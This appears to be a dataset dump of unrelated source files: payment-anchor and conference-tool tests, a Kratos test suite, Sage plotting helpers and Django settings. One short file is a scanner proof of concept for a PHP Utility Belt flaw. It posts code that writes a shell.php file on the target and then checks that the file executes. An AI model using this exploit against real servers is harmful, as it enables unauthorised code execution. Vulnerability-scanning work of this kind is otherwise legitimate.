response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 500
assert "The anchor did not provide form content, unable to serve page." in str(
response.content
)
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.form_for_transaction")
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_post_no_content_tx_complete(
mock_content_for_template, mock_form_for_transaction, client
):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.completed
)
mock_form_for_transaction.return_value = None
mock_content_for_template.return_value = {"test": "value"}
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 422
assert (
"The anchor did not provide content, is the interactive flow already complete?"
in str(response.content)
)
@pytest.mark.django_db
@patch("polaris.sep24.deposit.rdi.content_for_template")
def test_interactive_deposit_post_validation_is_called_before_next_form(
mock_content_for_template, client
):
"""
Ensures we call DepositIntegration.after_form_validation() for the posted form data
before we call DepositIntegration.form_for_transaction() to retrieve the next form
"""
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, kind=Transaction.KIND.deposit, status=Transaction.STATUS.incomplete
)
mock_content_for_template.return_value = {"test": "value"}
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
returned_bound_form = False
validated = False
def mock_after_form_validation(*args, **kwargs):
nonlocal validated
validated = True
def mock_form_for_transaction(*args, **kwargs):
nonlocal returned_bound_form
if kwargs.get("post_data"):
returned_bound_form = True
return TransactionForm(kwargs.get("transaction"), kwargs.get("post_data"))
else:
if returned_bound_form and not validated:
raise RuntimeError()
return TransactionForm(kwargs.get("transaction"))
with patch(
"polaris.sep24.deposit.rdi.form_for_transaction", mock_form_for_transaction
):
with patch(
"polaris.sep24.deposit.rdi.after_form_validation",
mock_after_form_validation,
):
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={usd.code}"
)
assert response.status_code == 200
assert client.session["authenticated"] is True
response = client.post(
f"{WEBAPP_PATH}/submit"
f"?transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}",
{"amount": 100},
)
assert response.status_code == 302
@pytest.mark.django_db()
@patch("polaris.sep24.deposit.rdi.interactive_url")
def test_deposit_interactive_complete(mock_interactive_url, client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, status=Transaction.STATUS.incomplete
)
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
mock_interactive_url.return_value = "https://test.com/customFlow"
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 302
mock_interactive_url.assert_called_once()
assert client.session["authenticated"] is True
response = client.get(
DEPOSIT_PATH + "/complete",
{"transaction_id": deposit.id, "callback": "test.com/callback"},
)
assert response.status_code == 302
redirect_to_url = response.get("Location")
assert "more_info" in redirect_to_url
assert "callback=test.com%2Fcallback" in redirect_to_url
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.pending_user_transfer_start
@pytest.mark.django_db()
@patch("polaris.sep24.deposit.rdi.interactive_url")
def test_deposit_interactive_complete_not_found(mock_interactive_url, client):
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
deposit = Transaction.objects.create(
asset=usd, status=Transaction.STATUS.incomplete
)
payload = interactive_jwt_payload(deposit, "deposit")
token = jwt.encode(payload, settings.SERVER_JWT_KEY, algorithm="HS256")
mock_interactive_url.return_value = "https://test.com/customFlow"
response = client.get(
f"{WEBAPP_PATH}"
f"?token={token}"
f"&transaction_id={deposit.id}"
f"&asset_code={deposit.asset.code}"
)
assert response.status_code == 302
mock_interactive_url.assert_called_once()
assert client.session["authenticated"] is True
response = client.get(
DEPOSIT_PATH + "/complete",
{"transaction_id": "bad id", "callback": "test.com/callback"},
)
assert response.status_code == 403
deposit.refresh_from_db()
assert deposit.status == Transaction.STATUS.incomplete
@pytest.mark.django_db
@patch("polaris.sep10.utils.check_auth", mock_check_auth_success_client_domain)
def test_deposit_client_domain_saved(client):
kp = Keypair.random()
usd = Asset.objects.create(
code="USD",
issuer=Keypair.random().public_key,
sep24_enabled=True,
deposit_enabled=True,
)
response = client.post(
DEPOSIT_PATH,
{"asset_code": usd.code, "account": kp.public_key},
)
content = response.json()
assert response.status_code == 200, json.dumps(content, indent=2)
assert Transaction.objects.count() == 1
transaction = Transaction.objects.first()
assert transaction.client_domain == "test.com"
| StarcoderdataPython |
4827564 | <filename>src/tests/functional/orga/test_auth.py
import pytest
from django.urls import reverse
@pytest.mark.django_db
def test_orga_successful_login(client, user, template_patch):
user.set_password('<PASSWORD>')
user.save()
response = client.post(reverse('orga:login'), data={'username': user.nick, 'password': '<PASSWORD>'}, follow=True)
assert response.status_code == 200
@pytest.mark.django_db
def test_orga_redirect_login(client, orga_user, event):
queryparams = 'foo=bar&something=else'
request_url = event.orga_urls.base + '/?' + queryparams
response = client.get(request_url, follow=True)
assert response.status_code == 200
assert response.redirect_chain[-1] == (f'/orga/login/?next={event.orga_urls.base}/&{queryparams}', 302)
response = client.post(response.redirect_chain[-1][0], data={'username': orga_user.nick, 'password': '<PASSWORD>'}, follow=True)
assert response.status_code == 200
assert event.name in response.content.decode()
assert response.redirect_chain[-1][0] == request_url
@pytest.mark.django_db
def test_orga_accept_invitation_once(client, event, invitation):
    """An invitation token registers exactly one user; any reuse 404s."""
    assert invitation.user is None
    # First use: register a fresh account against the token.
    response = client.post(
        reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token}),
        {
            'register_username': 'newuser',
            'register_email': invitation.invitation_email,
            'register_password': '<PASSWORD>!',
            'register_password_repeat': '<PASSWORD>!',
        },
        follow=True,
    )
    assert response.status_code == 200
    invitation.refresh_from_db()
    assert invitation.user.nick == 'newuser'
    # Viewing the consumed token again must 404.
    response = client.get(
        reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token}),
        follow=True
    )
    assert response.status_code == 404
    # A second registration attempt must not hijack the invitation either.
    response = client.post(
        reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token}),
        {
            'register_username': 'evilnewuser',
            'register_email': invitation.invitation_email + '.evil',
            'register_password': '<PASSWORD>!',
            'register_password_repeat': '<PASSWORD>!',
        },
        follow=True,
    )
    assert response.status_code == 404
    invitation.refresh_from_db()
    # The invitation still belongs to the original registrant.
    assert invitation.user.nick == 'newuser'
@pytest.mark.django_db
def test_orga_incorrect_invite_token(client, event, invitation):
assert invitation.user is None
response = client.get(
reverse('orga:invitation.view', kwargs={'code': invitation.invitation_token + 'WRONG'}),
follow=True
)
assert response.status_code == 404
| StarcoderdataPython |
8038332 | # import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.FSIApplication import *
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import the tests o test_classes to create the suits
## SMALL TESTS
from convergence_accelerator_test import ConvergenceAcceleratorTest
from convergence_accelerator_spring_test import ConvergenceAcceleratorSpringTest
from FSI_problem_emulator_test import FSIProblemEmulatorTest
from non_conformant_one_side_map_test import NonConformantOneSideMapTest
## NIGTHLY TESTS
## VALIDATION TESTS
from mok_benchmark_test import MokBenchmarkTest
def AssembleTestSuites():
    ''' Populates the test suites to run.

    Populates the test suites to run. At least, it should populate the suites:
    "small", "nighlty" and "all"

    Return
    ------

    suites: A dictionary of suites
        The set of suites with its test_cases added.
    '''
    suites = KratosUnittest.KratosSuites

    # Small suite: registered table-driven, preserving the original order of
    # test classes and methods.
    small_cases = [
        (ConvergenceAcceleratorTest, [
            'test_aitken_accelerator',
            'test_mvqn_accelerator',
            'test_mvqn_recusive_accelerator',
            'test_accelerator_with_jacobian',
        ]),
        (FSIProblemEmulatorTest, [
            'testFSIProblemEmulatorWithAitken',
            'testFSIProblemEmulatorWithMVQN',
            'testFSIProblemEmulatorWithMVQNRecursive',
        ]),
        (ConvergenceAcceleratorSpringTest, [
            'test_aitken_accelerator_constant_forces',
            'test_aitken_accelerator_variable_stiffness',
            'test_mvqn_recursive_accelerator_constant_forces',
            'test_mvqn_recursive_accelerator_variable_stiffness',
        ]),
        (NonConformantOneSideMapTest, [
            'test2D_1',
            'test2D_2',
            'test3D_1',
            'test3D_two_faces',
        ]),
    ]
    smallSuite = suites['small']
    for test_class, method_names in small_cases:
        for method_name in method_names:
            smallSuite.addTest(test_class(method_name))

    # Nightly suite contains everything in the small suite.
    nightSuite = suites['nightly']
    nightSuite.addTests(smallSuite)

    # Validation suite: long-running benchmark checks only.
    validationSuite = suites['validation']
    validationSuite.addTest(MokBenchmarkTest('testMokBenchmark'))

    # "all" aggregates the nightly suite (which already includes "small").
    allSuite = suites['all']
    allSuite.addTests(nightSuite)

    return suites
# Allow invoking the suite directly from the command line.
if __name__ == '__main__':
    KratosUnittest.runTests(AssembleTestSuites())
| StarcoderdataPython |
6424075 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Refer___ : https://www.exploit-db.com/exploits/38901/
import re
def assign(service, arg):
    """Claim the scan task when it targets the service this PoC handles.

    Returns (True, arg) for "php_utility_belt"; returns None (implicitly in
    the original, explicitly here) for any other service.
    """
    if service != "php_utility_belt":
        return None
    return True, arg
def audit(arg):
    """PoC check for PHP Utility Belt RCE (EDB-38901): drop a marker webshell
    via ajax.php and confirm it executes.

    NOTE(review): ``curl`` and ``security_info`` are not defined in this
    module -- they are presumably injected by the scanner framework via
    ``from dummy import *`` in the ``__main__`` block; confirm before reuse.
    """
    url = arg+'ajax.php'
    # The vulnerable endpoint eval()s the posted ``code`` parameter; this
    # payload writes shell.php whose output is md5("123").
    POST_Data = "code=fwrite(fopen('shell.php','w'),'<?php echo md5(123);?>');"
    curl.curl('-d "%s" "%s"' % (POST_Data,url))
    shellurl=arg+'shell.php'
    code, head, res, errcode, _ = curl.curl(shellurl)
    # 202cb962... == md5("123"); its presence proves the injected PHP ran.
    if code==200 and '202cb962ac59075b964b07152d234b70' in res:
        security_info('PHP Utility Belt - Remote Code Execution')
if __name__ == '__main__':
    # Standalone run: `dummy` star-import supplies stub curl/security_info
    # helpers used by audit() above.
    from dummy import *
    audit(assign('php_utility_belt','http://127.0.0.1:8080/php-utility-belt/')[1])
12807624 | <reponame>UCD4IDS/sage
"Plotting utilities"
# ****************************************************************************
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.ext.fast_callable import FastCallableFloatWrapper
from collections.abc import Iterable
def setup_for_eval_on_grid(funcs,
                           ranges,
                           plot_points=None,
                           return_vars=False,
                           imaginary_tolerance=1e-8):
    r"""
    Calculate the necessary parameters to construct a list of points,
    and make the functions fast_callable.
    INPUT:
    - ``funcs`` -- a function, or a list, tuple, or vector of functions
    - ``ranges`` -- a list of ranges.  A range can be a 2-tuple of
      numbers specifying the minimum and maximum, or a 3-tuple giving
      the variable explicitly.
    - ``plot_points`` -- a tuple of integers specifying the number of
      plot points for each range.  If a single number is specified, it
      will be the value for all ranges.  This defaults to 2.
    - ``return_vars`` -- (default ``False``) If ``True``, return the variables,
      in order.
    - ``imaginary_tolerance`` -- (default: ``1e-8``); if an imaginary
      number arises (due, for example, to numerical issues), this
      tolerance specifies how large it has to be in magnitude before
      we raise an error.  In other words, imaginary parts smaller than
      this are ignored in your plot points.
    OUTPUT:
    - ``fast_funcs`` - if only one function passed, then a fast
      callable function.  If funcs is a list or tuple, then a tuple
      of fast callable functions is returned.
    - ``range_specs`` - a list of range_specs: for each range, a
      tuple is returned of the form (range_min, range_max,
      range_step) such that ``srange(range_min, range_max,
      range_step, include_endpoint=True)`` gives the correct points
      for evaluation.
    EXAMPLES::
        sage: x,y,z=var('x,y,z')
        sage: f(x,y)=x+y-z
        sage: g(x,y)=x+y
        sage: h(y)=-y
        sage: sage.plot.misc.setup_for_eval_on_grid(f, [(0, 2),(1,3),(-4,1)], plot_points=5)
        (<sage...>, [(0.0, 2.0, 0.5), (1.0, 3.0, 0.5), (-4.0, 1.0, 1.25)])
        sage: sage.plot.misc.setup_for_eval_on_grid([g,h], [(0, 2),(-1,1)], plot_points=5)
        ((<sage...>, <sage...>), [(0.0, 2.0, 0.5), (-1.0, 1.0, 0.5)])
        sage: sage.plot.misc.setup_for_eval_on_grid([sin,cos], [(-1,1)], plot_points=9)
        ((<sage...>, <sage...>), [(-1.0, 1.0, 0.25)])
        sage: sage.plot.misc.setup_for_eval_on_grid([lambda x: x^2,cos], [(-1,1)], plot_points=9)
        ((<function <lambda> ...>, <sage...>), [(-1.0, 1.0, 0.25)])
        sage: sage.plot.misc.setup_for_eval_on_grid([x+y], [(x,-1,1),(y,-2,2)])
        ((<sage...>,), [(-1.0, 1.0, 2.0), (-2.0, 2.0, 4.0)])
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,-1,1),(y,-1,1)], plot_points=[4,9])
        (<sage...>, [(-1.0, 1.0, 0.6666666666666666), (-1.0, 1.0, 0.25)])
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,-1,1),(y,-1,1)], plot_points=[4,9,10])
        Traceback (most recent call last):
        ...
        ValueError: plot_points must be either an integer or a list of integers, one for each range
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(1,-1),(y,-1,1)], plot_points=[4,9,10])
        Traceback (most recent call last):
        ...
        ValueError: Some variable ranges specify variables while others do not
    Beware typos: a comma which should be a period, for instance::
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x, 1, 2), (y, 0,1, 0.2)], plot_points=[4,9,10])
        Traceback (most recent call last):
        ...
        ValueError: At least one variable range has more than 3 entries: each should either have 2 or 3 entries, with one of the forms (xmin, xmax) or (x, xmin, xmax)
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(y,1,-1),(x,-1,1)], plot_points=5)
        (<sage...>, [(1.0, -1.0, 0.5), (-1.0, 1.0, 0.5)])
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,1,-1),(x,-1,1)], plot_points=5)
        Traceback (most recent call last):
        ...
        ValueError: range variables should be distinct, but there are duplicates
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,1,1),(y,-1,1)])
        Traceback (most recent call last):
        ...
        ValueError: plot start point and end point must be different
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(x,1,-1),(y,-1,1)], return_vars=True)
        (<sage...>, [(1.0, -1.0, 2.0), (-1.0, 1.0, 2.0)], [x, y])
        sage: sage.plot.misc.setup_for_eval_on_grid(x+y, [(y,1,-1),(x,-1,1)], return_vars=True)
        (<sage...>, [(1.0, -1.0, 2.0), (-1.0, 1.0, 2.0)], [y, x])
    TESTS:
    Ensure that we can plot expressions with intermediate complex
    terms as in :trac:`8450`::
        sage: x, y = SR.var('x y')
        sage: contour_plot(abs(x+i*y), (x,-1,1), (y,-1,1))
        Graphics object consisting of 1 graphics primitive
        sage: density_plot(abs(x+i*y), (x,-1,1), (y,-1,1))
        Graphics object consisting of 1 graphics primitive
        sage: plot3d(abs(x+i*y), (x,-1,1),(y,-1,1))
        Graphics3d Object
        sage: streamline_plot(abs(x+i*y), (x,-1,1),(y,-1,1))
        Graphics object consisting of 1 graphics primitive
    """
    # Validate the ranges: all must have the same arity (2 or 3 entries).
    if max(map(len, ranges)) > 3:
        raise ValueError("At least one variable range has more than 3 entries: each should either have 2 or 3 entries, with one of the forms (xmin, xmax) or (x, xmin, xmax)")
    if max(map(len, ranges)) != min(map(len, ranges)):
        raise ValueError("Some variable ranges specify variables while others do not")
    if len(ranges[0]) == 3:
        # Variables are given explicitly as the first entry of each range.
        vars = [r[0] for r in ranges]
        ranges = [r[1:] for r in ranges]
        if len(set(vars)) < len(vars):
            raise ValueError("range variables should be distinct, but there are duplicates")
    else:
        # Infer the variables from the functions themselves.
        vars, free_vars = unify_arguments(funcs)
    # pad the variables if we don't have enough
    nargs = len(ranges)
    if len(vars) < nargs:
        vars += ('_',)*(nargs-len(vars))
    ranges = [[float(z) for z in r] for r in ranges]
    if plot_points is None:
        plot_points = 2
    if not isinstance(plot_points, (list, tuple)):
        plot_points = [plot_points]*len(ranges)
    elif len(plot_points) != nargs:
        raise ValueError("plot_points must be either an integer or a list of integers, one for each range")
    # Clamp to at least 2 points so each range has a well-defined step.
    plot_points = [int(p) if p >= 2 else 2 for p in plot_points]
    range_steps = [abs(range[1] - range[0])/(p-1) for range, p in zip(ranges, plot_points)]
    # A zero step means xmin == xmax for some range.
    if min(range_steps) == float(0):
        raise ValueError("plot start point and end point must be different")
    eov = False # eov = "expect one value"
    if nargs == 1:
        eov = True
    from sage.ext.fast_callable import fast_callable
    def try_make_fast(f):
        # If "f" supports fast_callable(), use it. We can't guarantee
        # that our arguments will actually support fast_callable()
        # because, for example, the user may already have done it
        # himself, and the result of fast_callable() can't be
        # fast-callabled again.
        from sage.rings.complex_double import CDF
        from sage.ext.interpreters.wrapper_cdf import Wrapper_cdf
        if hasattr(f, '_fast_callable_'):
            # Evaluate over CDF so small spurious imaginary parts (within
            # imaginary_tolerance) don't abort the plot; see :trac:`8450`.
            ff = fast_callable(f, vars=vars, expect_one_var=eov, domain=CDF)
            return FastCallablePlotWrapper(ff, imag_tol=imaginary_tolerance)
        elif isinstance(f, Wrapper_cdf):
            # Already a fast-callable, just wrap it. This can happen
            # if, for example, a symbolic expression is passed to a
            # higher-level plot() function that converts it to a
            # fast-callable with expr._plot_fast_callable() before
            # we ever see it.
            return FastCallablePlotWrapper(f, imag_tol=imaginary_tolerance)
        elif callable(f):
            # This will catch python functions, among other things. We don't
            # wrap these yet because we don't know what type they'll return.
            return f
        else:
            # Convert things like ZZ(0) into constant functions.
            from sage.symbolic.ring import SR
            ff = fast_callable(SR(f),
                               vars=vars,
                               expect_one_var=eov,
                               domain=CDF)
            return FastCallablePlotWrapper(ff, imag_tol=imaginary_tolerance)
    # Handle vectors, lists, tuples, etc.
    if isinstance(funcs, Iterable):
        funcs = tuple( try_make_fast(f) for f in funcs )
    else:
        funcs = try_make_fast(funcs)
    #TODO: raise an error if there is a function/method in funcs that takes more values than we have ranges
    if return_vars:
        return (funcs,
                [tuple(_range + [range_step])
                 for _range, range_step in zip(ranges, range_steps)],
                vars)
    else:
        return (funcs,
                [tuple(_range + [range_step])
                 for _range, range_step in zip(ranges, range_steps)])
def unify_arguments(funcs):
    """
    Collect the variables occurring in ``funcs``, separating out those
    that are "free" (i.e. not declared as arguments of a callable
    symbolic function).
    INPUT:
    - ``funcs`` -- a function or a list/tuple of functions; these can be
      symbolic expressions, polynomials, etc.
    OUTPUT:
    - A tuple of all variables found in the functions
    - A tuple of the variables that were "free" in the functions
    EXAMPLES::
        sage: x,y,z=var('x,y,z')
        sage: f(x,y)=x+y-z
        sage: g(x,y)=x+y
        sage: h(y)=-y
        sage: sage.plot.misc.unify_arguments((f,g,h))
        ((x, y, z), (z,))
        sage: sage.plot.misc.unify_arguments((g,h))
        ((x, y), ())
        sage: sage.plot.misc.unify_arguments((f,z))
        ((x, y, z), (z,))
        sage: sage.plot.misc.unify_arguments((h,z))
        ((y, z), (z,))
        sage: sage.plot.misc.unify_arguments((x+y,x-y))
        ((x, y), (x, y))
    """
    if not isinstance(funcs, (list, tuple)):
        funcs = [funcs]
    from sage.structure.element import Expression
    all_vars = set()
    free_vars = set()
    for func in funcs:
        if isinstance(func, Expression) and func.is_callable():
            declared = set(func.arguments())
            all_vars.update(declared)
        else:
            declared = set()
        try:
            undeclared = set(func.variables()).difference(declared)
        except AttributeError:
            # Constants (plain numbers, lambdas, ...) expose no .variables().
            continue
        all_vars.update(undeclared)
        free_vars.update(undeclared)
    return tuple(sorted(all_vars, key=str)), tuple(sorted(free_vars, key=str))
def _multiple_of_constant(n, pos, const):
    r"""
    Function for internal use in formatting ticks on axes with
    nice-looking multiples of various symbolic constants, such
    as `\pi` or `e`.  Should only be used via keyword argument
    `tick_formatter` in :meth:`plot.show`.  See documentation
    for the matplotlib.ticker module for more details.
    EXAMPLES:
    Here is the intended use::
        sage: plot(sin(x), (x,0,2*pi), ticks=pi/3, tick_formatter=pi)
        Graphics object consisting of 1 graphics primitive
    Here is an unintended use, which yields unexpected (and probably
    undesired) results::
        sage: plot(x^2, (x, -2, 2), tick_formatter=pi)
        Graphics object consisting of 1 graphics primitive
    We can also use more unusual constant choices::
        sage: plot(ln(x), (x,0,10), ticks=e, tick_formatter=e)
        Graphics object consisting of 1 graphics primitive
        sage: plot(x^2, (x,0,10), ticks=[sqrt(2),8], tick_formatter=sqrt(2))
        Graphics object consisting of 1 graphics primitive
    """
    from sage.misc.latex import latex
    from sage.rings.continued_fraction import continued_fraction
    from sage.rings.infinity import Infinity
    # Approximate n/const by a rational with a small denominator (< 12)
    # by walking down the continued-fraction expansion.
    approx = continued_fraction(n/pos if False else n/const)  # pos is unused by design (matplotlib API)
    depth = 1
    while approx.quotient(depth) != Infinity and approx.denominator(depth) < 12:
        depth += 1
    return '${}$'.format(latex(approx.convergent(depth - 1)*const))
def get_matplotlib_linestyle(linestyle, return_type):
    """
    Function which translates between matplotlib linestyle in short notation
    (i.e. '-', '--', ':', '-.') and long notation (i.e. 'solid', 'dashed',
    'dotted', 'dashdot' ).
    If linestyle is none of these allowed options, the function raises
    a ValueError.
    INPUT:
    - ``linestyle`` - The style of the line, which is one of
       - ``"-"`` or ``"solid"``
       - ``"--"`` or ``"dashed"``
       - ``"-."`` or ``"dash dot"``
       - ``":"`` or ``"dotted"``
       - ``"None"`` or ``" "`` or ``""`` (nothing)
       The linestyle can also be prefixed with a drawing style (e.g., ``"steps--"``)
       - ``"default"`` (connect the points with straight lines)
       - ``"steps"`` or ``"steps-pre"`` (step function; horizontal
         line is to the left of point)
       - ``"steps-mid"`` (step function; points are in the middle of
         horizontal lines)
       - ``"steps-post"`` (step function; horizontal line is to the
         right of point)
       If ``linestyle`` is ``None`` (of type NoneType), then we return it
       back unmodified.
    - ``return_type`` - The type of linestyle that should be output. This
      argument takes only two values - ``"long"`` or ``"short"``.
    EXAMPLES:
    Here is an example how to call this function::
        sage: from sage.plot.misc import get_matplotlib_linestyle
        sage: get_matplotlib_linestyle(':', return_type='short')
        ':'
        sage: get_matplotlib_linestyle(':', return_type='long')
        'dotted'
    TESTS:
    Make sure that if the input is already in the desired format, then it
    is unchanged::
        sage: get_matplotlib_linestyle(':', 'short')
        ':'
    Empty linestyles should be handled properly::
        sage: get_matplotlib_linestyle("", 'short')
        ''
        sage: get_matplotlib_linestyle("", 'long')
        'None'
        sage: get_matplotlib_linestyle(None, 'short') is None
        True
    Linestyles with ``"default"`` or ``"steps"`` in them should also be
    properly handled.  For instance, matplotlib understands only the short
    version when ``"steps"`` is used::
        sage: get_matplotlib_linestyle("default", "short")
        ''
        sage: get_matplotlib_linestyle("steps--", "short")
        'steps--'
        sage: get_matplotlib_linestyle("steps-predashed", "long")
        'steps-pre--'
    Finally, raise error on invalid linestyles::
        sage: get_matplotlib_linestyle("isthissage", "long")
        Traceback (most recent call last):
        ...
        ValueError: WARNING: Unrecognized linestyle 'isthissage'. Possible
        linestyle options are:
        {'solid', 'dashed', 'dotted', dashdot', 'None'}, respectively {'-',
        '--', ':', '-.', ''}
    """
    long_to_short_dict={'solid' : '-','dashed' : '--', 'dotted' : ':',
                        'dashdot':'-.'}
    short_to_long_dict={'-' : 'solid','--' : 'dashed', ':' : 'dotted',
                        '-.':'dashdot'}
    # We need this to take care of region plot. Essentially, if None is
    # passed, then we just return back the same thing.
    if linestyle is None:
        return None
    # BUGFIX: the previous implementation used str.strip(prefix), which
    # removes a *character set* from both ends rather than a prefix, so
    # inputs such as "steps-middashed" were mangled (-> ValueError).
    # Slicing off the matched prefix is the correct operation.
    if linestyle.startswith("default"):
        return get_matplotlib_linestyle(linestyle[len("default"):], "short")
    elif linestyle.startswith("steps"):
        # matplotlib only accepts the short style suffix after a drawing
        # style, so the recursion always requests "short" here.
        if linestyle.startswith("steps-mid"):
            return "steps-mid" + get_matplotlib_linestyle(
                linestyle[len("steps-mid"):], "short")
        elif linestyle.startswith("steps-post"):
            return "steps-post" + get_matplotlib_linestyle(
                linestyle[len("steps-post"):], "short")
        elif linestyle.startswith("steps-pre"):
            return "steps-pre" + get_matplotlib_linestyle(
                linestyle[len("steps-pre"):], "short")
        else:
            return "steps" + get_matplotlib_linestyle(
                linestyle[len("steps"):], "short")
    if return_type == 'short':
        if linestyle in short_to_long_dict:
            return linestyle
        elif linestyle == "" or linestyle == " " or linestyle == "None":
            return ''
        elif linestyle in long_to_short_dict:
            return long_to_short_dict[linestyle]
        else:
            raise ValueError("WARNING: Unrecognized linestyle '%s'. "
                             "Possible linestyle options are:\n{'solid', "
                             "'dashed', 'dotted', dashdot', 'None'}, "
                             "respectively {'-', '--', ':', '-.', ''}"%
                             (linestyle))
    elif return_type == 'long':
        if linestyle in long_to_short_dict:
            return linestyle
        elif linestyle == "" or linestyle == " " or linestyle == "None":
            return "None"
        elif linestyle in short_to_long_dict:
            return short_to_long_dict[linestyle]
        else:
            raise ValueError("WARNING: Unrecognized linestyle '%s'. "
                             "Possible linestyle options are:\n{'solid', "
                             "'dashed', 'dotted', dashdot', 'None'}, "
                             "respectively {'-', '--', ':', '-.', ''}"%
                             (linestyle))
class FastCallablePlotWrapper(FastCallableFloatWrapper):
    r"""
    A fast-callable wrapper for plotting that substitutes ``nan`` for
    the result whenever the imaginary tolerance would be exceeded,
    instead of raising an error.
    A detailed rationale for this can be found in the superclass
    documentation.
    EXAMPLES:
    The ``float`` incarnation of "not a number" is returned instead
    of an error being thrown if the answer is complex::
        sage: from sage.plot.misc import FastCallablePlotWrapper
        sage: f = sqrt(x)
        sage: ff = fast_callable(f, vars=[x], domain=CDF)
        sage: fff = FastCallablePlotWrapper(ff, imag_tol=1e-8)
        sage: fff(1)
        1.0
        sage: fff(-1)
        nan
    """
    def __call__(self, *args):
        r"""
        Evaluate the underlying fast-callable and convert the result to
        ``float``.
        TESTS:
        Evaluation never fails and always returns a ``float``::
            sage: from sage.plot.misc import FastCallablePlotWrapper
            sage: f = x
            sage: ff = fast_callable(f, vars=[x], domain=CDF)
            sage: fff = FastCallablePlotWrapper(ff, imag_tol=0.1)
            sage: type(fff(CDF.random_element())) is float
            True
        """
        try:
            result = super().__call__(*args)
        except ValueError:
            # The imaginary part exceeded imag_tol; plot this as a gap.
            result = float("nan")
        return result
| StarcoderdataPython |
171280 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from signbank.settings.base import *
# settings.base imports settings_secret
# The following settings are defined in settings_secret:
# SECRET_KEY, ADMINS, DATABASES, EMAIL_HOST, EMAIL_PORT, DEFAULT_FROM_EMAIL
# Debug should be True in development but not in production!
DEBUG = True
# A list of directories where Django looks for translation files.
# NOTE(review): this file mixes Windows (C://...) and Linux (/home/...)
# paths -- confirm which deployment target this settings module serves.
LOCALE_PATHS = (
    # '/home/heilniem/signbank-fi/locale',
    'C://utv//testPyCharmCE//FinSLsignbank//locale',
    # 'C://Users//localperla331//PycharmProjects//FinSLsignbank//locale',
)
# The absolute path to the directory where collectstatic will collect static files for deployment.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = '/home/heilniem/signbank-fi/static/'
# This setting defines the additional locations the staticfiles app will traverse if the FileSystemFinder finder
# is enabled, e.g. if you use the collectstatic or findstatic management command or use the static file serving view.
STATICFILES_DIRS = (
    os.path.join(PROJECT_DIR, "signbank", "static"),
)
# Absolute filesystem path to the directory that will hold user-uploaded files.
MEDIA_ROOT = 'C:/data/teckenvideo'
# URL that handles the media served from MEDIA_ROOT, used for managing stored files.
# It must end in a slash if set to a non-empty value.
MEDIA_URL = '/media/'
# Within MEDIA_ROOT we store newly uploaded gloss videos in this directory
GLOSS_VIDEO_DIRECTORY = 'glossvideo'
# location and URL for uploaded files
UPLOAD_ROOT = MEDIA_ROOT + "upload/"
UPLOAD_URL = MEDIA_URL + "upload/"
# To test emailing, use this to show emails in the console
#EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Verbose DEBUG-level logging to both the console and a file next to the
# project (requests and SQL queries are logged separately below).
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
        },
        'file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': os.path.join(PROJECT_DIR, 'debug.log'),
